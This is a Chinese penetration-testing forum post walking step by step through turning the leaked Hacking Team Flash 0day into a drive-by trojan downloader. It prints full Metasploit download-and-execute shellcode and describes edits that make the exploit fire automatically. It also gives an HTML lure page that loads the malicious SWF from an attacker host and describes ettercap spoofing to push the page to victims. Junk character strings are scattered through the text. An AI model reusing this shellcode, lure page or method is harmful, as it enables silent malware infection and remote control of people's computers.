中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]
作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

$ t/ m! i$ ^* z y6 ~, ` 三、flash 0day之手工代码修改制作下载者实例入侵演示 . V. L/ }) N8 O2 n

+ f$ e: P8 K _3 N+ B$ A

) ?$ I0 n8 X C$ D+ c8 `" b 利用到的工具: - _: Q+ ]$ }$ k& ?) [

! W) I6 u/ q# B- }. g

: z' y6 D O7 Y- g Msf . M9 D7 T. h! h/ V7 p8 e$ E

& w( @. [; E. I1 g0 M: \

- w7 V$ d( n3 z Ettercap 3 y/ g, h x: b; [& b* K5 Q

9 K8 f: B& f) {( p4 w: o4 ?. c- F

( o5 n% J: f K1 w4 e' j Adobe Flash CS6 - w, I3 X$ z8 f; r& L5 X* l( Y# V+ }

$ q6 t7 U9 E9 {' f

% `: r# W/ \% |* a/ p2 u Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 e5 s( y0 }4 W9 w9 @4 z

: K) }2 i0 o, [. A

1 c1 ?5 ]1 }8 x! P I) ^ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options # t9 t1 O8 K0 K+ c

6 W9 P- v% ]* \! y5 {; I" w

" O. o- Y, Y/ p. p' K# d: z2 O 如图: $ b/ I2 x; G8 \2 d' ~

: C! n8 z. w0 C' l& D+ m

/ S( y' b% I* v! _5 H0 _   + Z- S8 x; ]* V( Q& q7 s

- t7 q- y! J; t4 ~/ Q7 ~$ Q

) X$ N6 i" c% f% S ], h   # U9 T C9 W% I4 w. J

# A! t" [8 b- L6 L' i; G6 \8 f

1 c7 j. R3 Q5 x* I 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ! |9 l$ l- _9 v, }: T8 x3 p# V1 p& l* n

( i/ F5 |% b" j* x1 L

! G3 b/ J7 g6 x0 P   5 B+ ]" G" s8 m9 |7 K

" L# n* ~5 h* W5 T1 m

7 k5 r, T7 _& @' ~7 K   , R3 W, p& c! m. x6 L( |8 L

' S& } G, _8 C S1 l' F

1 W4 `! F1 _ A 然后执行generate -t dword生成shellcode,如下: & Q: H0 C# c' I+ W6 T

/ }- P; o, F6 b0 }6 E# y

0 b# O# z; g1 E) t" }   : n9 m2 C+ p( h1 Z' b! C' s, V$ Z

, a9 h6 B. W1 a$ S# C

. j4 T' B# N9 Z# [; E) v 复制代码到文本下便于我们一会编辑flash exp,如下: 2 n5 Z0 _" |/ @

" g/ k& Z- \3 \+ ^3 [

6 {2 J4 f% b5 ? 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, - n' }; l" G5 T

" c5 h C1 q' `

6 L: C# S4 G. t( N 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 6 }* V4 y8 N) z8 z- p4 s' H3 ~9 t

' y7 c+ s# I0 k, y0 @

* w) v+ f# q& z, C" B6 v 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, % |( r! H# y! i: X

/ m+ y/ _0 w# Y8 {4 v

+ ]$ g" p6 Q( S& t/ _9 d. k 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ; }; p8 g+ Q' j5 W3 D

/ {" y9 N% f, c4 b- w) u2 \

1 E- W' d6 F: s% _, ^, i& \4 L 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, # m M0 C n; r/ U k3 s2 q

. a! P. E6 I9 F; \* N) j6 n

9 o* |8 m5 z R K( _/ B 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 4 @) J, b7 d! C) O( O% B i

' B, r. J- E/ p' A

: W" H# e0 L1 ^6 H1 _ 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, . J7 z+ `& B: D( C7 T }) ^

- ~$ E, @- s6 G' Q

, g+ V6 C5 R M 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, & R" |1 A8 A. J& v# D0 y3 D

* f$ A: e& a9 b

/ }' o$ k2 Z1 O6 W i0 B5 A+ [ 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 1 o0 o8 b# A8 M5 d5 k1 E

/ E0 V6 U5 ]; q) @" X( q V/ D

2 p7 L7 u+ b: F- m- A, | 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 2 @ a' W% W3 {7 T

2 j f" [+ t5 |6 Q: u" K q% Q0 T8 _

% p& J! B9 t9 R8 R% x 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, # X4 ^8 p1 U4 Q- Y

$ n+ P4 z$ t( p) t; ?# H6 ~# V

/ x- n% u* S4 V- r4 f! N 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, * B6 b& B# D1 G! i- u; t1 T: W& p

8 |1 a" r# V: K3 ^7 @; g

5 K" A. K. Q7 p4 Q7 s- C 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, * }, B% F1 n( U Y

( D7 W1 m3 j- ^; j; P8 X' s

, o: K0 P+ v6 J" v) v2 R2 d 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 8 N- b, W3 Q- r" i+ K) w

" Y- a; {! E8 r; i

4 J- E$ g$ ~* I8 B   ( w9 y: f: J1 U ~

" W r, F& w# t

0 R; m$ B& x# |: }$ g* |   1 f& ~4 U }' d w1 z7 z- P

7 m, C W0 P, S$ R: V) o

+ m) X' g( t5 ^1 X* m 下面我们来修改flash 0day exp,需要修改三个文件,分别为: / V2 g4 J1 g. T, @

. `; r4 ~- m# o& n, t+ W% q. l

3 Q$ `' g3 G- R$ j! N. }   ; H, d! t8 J3 i7 b

& z# R5 f9 n$ f) f) v

* c" D- R+ d3 [' H 先修改ShellWin32.as,部分源代码如图: ; b v4 A# _. {) q, {

1 o7 S6 [1 E! r9 a. {

- |5 j( v. V! f7 R   - O5 x- ^4 M0 H& s) M, s5 a+ J

, ?# c. B- x2 v& Z( x' |

& i8 @# F9 d0 w 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 1 \- e) r7 q' x1 t! u' k3 M

& W8 r7 v. u+ S& F4 s% \" j

$ A; o$ K9 L: _( H   8 P/ A% w+ [$ |

: Q7 O6 w9 l! b7 L. c3 ]

# ?# _8 L5 J: B: t5 R 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 5 k! Y3 _+ R" k; a

& j* b/ ^! o) Q: V. J8 Y' U. ?5 h1 d

( E: Y; O9 e+ D) K: ]   N1 N0 {7 T7 k! ]

/ _3 v' f; N+ v$ E) }3 a8 F, ?

' F& F$ Y7 b) ^* B a2 C 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: * `7 f7 K2 G! V1 H

2 Q% w! a/ F2 p; T5 Q. N8 y

- }6 R- B2 H$ a8 E   ) f, {6 v8 t1 M! ~0 L. P; l

2 g& @3 @. i* k, r1 L

+ M8 _6 r- v. s7 O   8 u' t- A0 R; e! l. G

, l" r" M" d8 f7 C: P

M) \+ z9 W/ f, ^1 f   ' B9 @# M9 @! [; t& A# H$ |

. d5 X w' C5 A: {; k( m

_6 K! I( {! m4 v% ?7 _ 然后点保存,下面我们来编译一下,打开 & p7 e" J. g- ~& k: l9 J

- \% c) M& x7 r/ s) l: s5 s: p

9 i Z" F6 W- @7 Q exp1.fla然后点文件-发布,看看编译没错误 ) y, ?1 @- e4 k2 V

; \- X# R/ O' g1 v

q/ q+ [5 Y( r   8 K O# @3 e0 Q( V" B- M8 `

/ i/ \& X/ W y

; z, B+ y* n' B* ~& J5 }$ y9 x   ; c0 r& M, p' H: ^

+ L. x7 y' b* t [& x3 Q: C

0 }8 p0 U7 |5 O) G/ n' ]( U   : q/ W5 @: G4 a, G) I* M

2 p4 j: ]6 F$ ~" Z) o& T% N

+ q2 n" H: Y" m8 @( B @: j   ' ]; ]7 ~! K- o1 K" Q% e

# ~( [# d3 r1 e& s% u( u

- S* M; w% G* _' I( q2 H5 D. @ 然后我们把生成的 : b _. \/ n3 X

" j" A- @# I( `2 \/ O& j1 U# L' ?) P% I

& k+ k3 A1 [' w, ~2 G% l exp1.swf丢到kailinux /var/www/html下: 1 h! j: E8 Y3 ^ Y! _) |

' q' n! n0 v0 C9 V

8 H: w% X4 [7 C M9 b) a. v) m: o ] 然后把这段代码好好编辑一下 4 U3 P2 N- S$ l$ J4 ?8 J

9 x: u- G# s& Y3 t7 p/ K2 z3 O

: g1 _, v, [ s7 O" I/ z) N) w2 m, J   : ]9 r2 M& m% D9 {/ s- d3 S: q

7 J2 r5 z9 y2 ~- m

. Z( r- k/ ~3 t   ! }/ I: `0 V. |1 M3 ]3 R0 ?9 C

3 i) u, D2 R8 J6 ]( u! x

6 d, r5 m- Y) L1 Y' |   ! P0 J s+ ]7 \! }& X

) }. N; Y% q+ j, `4 l

! |' I. ^6 n3 R$ V' E4 v   " M* i* h* i! T2 u2 u2 G: S

3 B2 o" x( B, z, b& h# J% a

8 {0 y! E- K) S   ' b/ `" Y0 b7 N1 ^* X& R$ P

: H4 F k. J/ T+ N! [5 E

) b. O2 `2 X. @ O: g% U1 p$ g   : N: l9 b' ?) s

. p y2 V f7 ~' z3 a7 \' e8 u* ~

% ?# E, v+ m' f" `$ |# ~ <!DOCTYPE html> 2 d$ j. Z( D) f2 G1 \* D/ k0 D

+ }# ]4 [" o& b# g4 q# D- }

4 ?! J9 ]* B4 t <html> + [3 I) k' d- M* Q4 C$ a' D: N

' G% F0 ^' J4 ?9 A

4 _5 ]. K; j/ n+ N# c: j <head> 5 J# y( }; s! K) ^

( u1 o* y% k2 s# z9 H( N! S

: M; I) ]5 E3 d( l" {& |" | <meta http-equiv="Content-Type" content="text/html; ( Q8 V! t4 ?8 s3 y

. d. X7 z) X& y) y- b9 g7 \# w

& |/ [! O) Q, q! o charset=utf-8"/> % p1 L# V( A( S- S

. j' }& D+ p7 R; j4 K3 T" i% }

- c; G4 _% v I, c </head> 5 b7 B% }( J9 ` j6 S

' N- k _/ g$ a {5 A8 [% d" @

4 w2 M2 i7 z8 a8 x$ E2 _& U <body> % ]! \3 D w; n. o, S3 j6 ~" t3 x S

! q9 \6 `9 D/ k, A

# A3 }% n7 {$ F' A6 V5 ]; n6 @ <h2> Please wait, the requested page is loading...</h2> 0 g5 q( t5 D( J

: E! B; \/ T- ]9 ]. F) h0 o5 |

% w/ a6 _& \' H% ~$ a/ A <br> ; H9 U6 g; m( c& g9 u. U& ?

8 m/ q; m* T% c G2 K

: L" u/ h$ C4 y' G+ R <OBJECT ! o5 D+ N' N4 `9 P( l# a

7 X- U* x! L* O! f

8 L% X. V1 m# a% E( S classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 3 W; G) c3 w6 M5 U3 z+ T6 \

4 q% o9 ~1 a, \ P4 X' t+ Y

+ D7 t0 P& b) x$ R+ N VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 9 d" p2 b' M5 e# C, n3 g( S6 s

4 u, g1 U7 B R9 p

) ? M) C* n7 Z7 ]+ E </body> ; J& d" R# m! m8 [( x r6 q* _: p

7 U- j, B; Y5 m5 y# H' ?/ g

5 c X$ ^5 r/ d) v4 b9 t) Z <script> / }% Y; n0 P$ ~$ P" [

! x7 U1 V& |( _: t9 A

, N% n1 ]6 ?3 b     setTimeout(function () { ( k& r8 ?+ Z4 C& e1 {9 B0 J

3 J f% `8 |7 P

5 d7 [" [& l: w. E, O/ l# V2 b          , H4 w( _' a2 X% N9 |6 S3 M! R6 [ Q

# [/ j' `, c, }/ C# Z% `

% z- K' o1 a" m: K( c7 i9 ` window.location.reload(); 4 z, j( Y" Y" y( r

# h: B/ B. Z. c

% L! C c) U; G9 T4 g/ r. r     }, 10000); ; r, n1 a, }8 g" N& `: T0 N( P

6 H& t8 A; D, \* a- }

8 t0 e* y; o+ }4 S: {0 V' T   4 O- X0 Y% p( i7 a: c/ p; z

3 y" L! | L$ T0 }

6 ]4 e* y# @( ~" U8 _. y5 Y </script> ' p/ i/ l; `: b$ G6 I1 f

/ i! E2 m& Y. X- z- Y; X9 b/ _

0 E6 d/ Y0 N5 n& l </html> . {( U9 c5 t' |) k; W

" {5 [8 K) P: Y2 L; T/ P1 `

5 e( ~' n a8 W0 m# {: B   u& U' C% j! l" w; p$ v

8 {1 R+ z) @" \- M1 H

% `6 k6 k, Y4 ?- I- i2 P 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) E3 D$ m- @# _1 l

+ f& a/ Z* s9 X2 l3 Y9 K% X

1 c, f1 U- D8 @% s$ E4 S   % M2 ~0 l6 S: h) x) x* s# r: N

: w$ t' x- d+ o/ s3 T

c* E2 \8 j. M c# ?   . Y* [- G- Z; \) f4 c0 l _0 `

$ J u: u# x& d) o! Z

+ c3 j' C$ E3 X4 k- s E& v& I   ! @6 F `% \' ]* S

7 c7 m) M& W" ~1 v1 ` ^( W

6 A. Y( i* b6 K4 m: r   " P, v# R5 {8 B. J' D

7 P2 v! J4 G7 G# V ~% S5 J1 C

! a- r1 Y2 S q! a- l7 a   9 \, r( E7 Y7 D; A+ w2 r; {4 i

& y; _6 e: K7 E

$ H& Q& b x, f6 B) \ 下面我们用ettercap欺骗如图: d+ X( x. }5 ?

# o- F. `7 G& {% h1 Y" b

$ m: S5 f. b, j Y; w2 g   . @! d* U% y4 d- a: r& D

" t7 u' q8 h9 F. Z

t1 L: ^, |! t4 i+ _ H   8 k1 c; B) i0 G( Q( x/ b

& W% R; \( F# R- y& w: R8 C

5 G7 s0 H' M; w, V6 ^9 N9 F 下面我们随便访问个网站看看: 8 d1 v+ G, ~" X9 E1 U1 u+ ~1 g

1 I5 h' n: l% E. R$ l' z3 f' g) [/ P

) Z3 W- h" U% b9 w3 T4 W$ W 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: " N1 S# j% m m: v. F6 U

0 b! i: H4 ]* u& S! r/ w

. D, d8 X7 r4 u% f: i   5 A" N# U! J% i. s/ {0 ^3 H: t- H8 D

! V" X4 H+ I! w( z! q

2 k/ P# q, P$ b: z: z 我们看另一台, 9 ]$ x! a1 k3 h- U! j

$ Z0 a9 o* N+ n0 `

5 B* ]( X; o& k0 T/ U, p6 p' v" b 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 8 N: w' C! x: b1 G# ^; G, O





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2